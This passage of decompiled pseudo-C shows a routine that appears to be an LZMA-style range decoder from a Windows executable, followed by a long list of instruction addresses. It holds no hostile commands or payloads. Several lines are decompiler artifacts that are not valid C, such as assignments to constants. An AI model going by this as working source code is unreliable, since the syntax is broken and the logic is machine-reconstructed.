							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                          0x00405ead
                          0x00405eb4
                          0x00405eba
                          0x00405ec0
                          0x00000000
                          0x00405ec4
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405ee6
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efb
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f46
                          0x00405f49
                          0x00405f71
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4b
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f63
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fba
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fbf
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fdc
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406022
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066ca
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406700
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406709
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406719
                          0x00406720
                          0x00406728
                          0x00406728
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x00000000
                          0x004060d9
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x004060bc
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
